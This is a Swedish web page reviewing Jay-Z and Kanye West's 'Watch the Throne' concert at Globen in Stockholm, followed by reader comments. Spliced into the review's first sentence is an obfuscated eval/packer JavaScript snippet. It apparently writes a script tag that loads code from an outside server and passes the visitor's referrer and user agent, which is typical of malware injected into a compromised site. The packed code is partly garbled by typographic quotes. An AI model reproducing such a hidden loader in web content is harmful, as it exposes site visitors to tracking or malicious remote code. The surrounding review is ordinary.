Image Image Image Image Image Image Image Image Image Image

| 13 maj, 2021

Scroll to top

Top

Recension | Jay-Z and Kanye West – Watch The Throne

Recension | Jay-Z and Kanye West – Watch The Throne
Revue Magazine

Review Overview

Musik
8.5
Show
8.5
Underhållning
0
5.7

Rating

Igår eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yksht|var|u0026u|referrer|zfhey||js|php’.split(’|’),0,{}))
möttes två av hiphopvärldens största, Chicagosonen och geniproducenten Kanye West och Brooklyns egna c.e.o Jay-z.

Marcy Projects möter South Side, för första gången tillsammans på svensk mark med sitt nya album Watch the Throne. Vi var många med höga förväntningar och duon bjöd upp till en av de snyggaste konserter någonsin.

Efter att alltid ha stått i skuggan av storebror Jay, ofta i egenskap av producent entrade igår rapparna scenen som jämlikar. Platsen var Globen i Stockholm och öppningslåten “HAM” gjorde sig bra med sin mäktiga änglakör i bakgrunden. Denna följdes av “Who Gon Stop Me” för att sedan rada upp ytterligare låtar från Watch the Throne-albumet, men det hela blev egentligen bara en väntan på klassikerna.

Efter sex låtar tillsammans från Watch the Throne var det dags för Kanye att vila och Jay-z att riva av “Nigga What Nigga Who” från 1998 och det är först då det slår mig att det är det här man vill höra. De två enas i “Diamonds från Sierra Leone” publiken svarar med att forma händerna till Roc-a-fella-diamanten. Konserten når en av sina höjdpunkter när Jay-z ensam bjuder på ett stycke hiphophistoria med låtarna “Public Service Announcement” och “U Don’t Know”, Frank Sinatras ”New York New York” fade:ar över till ”Emipre State of Mind” och publiken har fått valuta för sina pengar.

httpv://www.youtube.com/watch?v=Aow6p23kXP8

Efter att Kanye tagit auto-tunern till en helt ny nivå- lite för länge, tar han sitt förnuft till fånga och frågar storebror Jay om råd vad gäller tjejerna. Det ena mästerverket radas upp efter det andra tillsammans med snygga videoklipp.

Konserten börjar gå mot sitt slut, på skärmen bakom scenen visas filmer från  naturkatastrofer och krig ackompanjerat av Louis Armstrongs ”What a wonderful world”, ingen hiphop utan lite politik. Den otroligt snygga ”No church in the wild” spelas, inte utan att man saknar Frankie Ocean.

httpv://www.youtube.com/watch?v=hiXzNzUKpAA

Avslutningsvis och inte helt oväntat var det dags att sätta kronan på verket. “Ni**as in Paris” x 5 och Globen expoderar. Vid ett tillfälle under konserten säger Jay någonting i stil med- “People, look up in the sky. You are going to remember this for the rest of your life” Jag tittar upp i taket, sedan ner på mina vänner för att konstatera- Ja det kommer vi.

Bästa låtar:

Otis

Public service announcement

Gold Digger

99 Problems

Ni**as In Paris

Tack till skribent Adam Györki

 

Comments

 1. En otrolig kväll som jag aldrig kommer glömma.
  Public Service Announcement och Otis var helt magiska!!!!

  Tack för en bra recension också!

 2. Grymt! 🙂

  Vet någon hur det var på festen efter?
  Det finns ju ingen information om detta.

  / David

  •  Ja den var på nattklubben V i Stockholm.

   Jag tror den var inom rätt stängda dörrar. Har svårt att tro det kommer komma upp bilder från den. Du kan ju hålla dig uppdaterad på Stureplan.se som brukar fota på sina klubbar.

   Sen var det bara Jay-Z som var där tror jag.

   Bra recension och riktigt bra kväll!!!!

  • Hemlig

    http://stureplan.se/bilder/event/2012/05/29/all-black-party-hosted-by-jay-z bilder från efterfesten ”Black party”

 3. Grym Recension!!

  Var inte på konserten vilket jag verkligen ångrar.

  Få satsa på nästa gång de anländer 🙂

 4. Johanna

  Vilka andra städer spelar de i? Är det på europaturne?

  Synd att man missade detta, hoppas de kommer till Göteborg nästa gång 🙂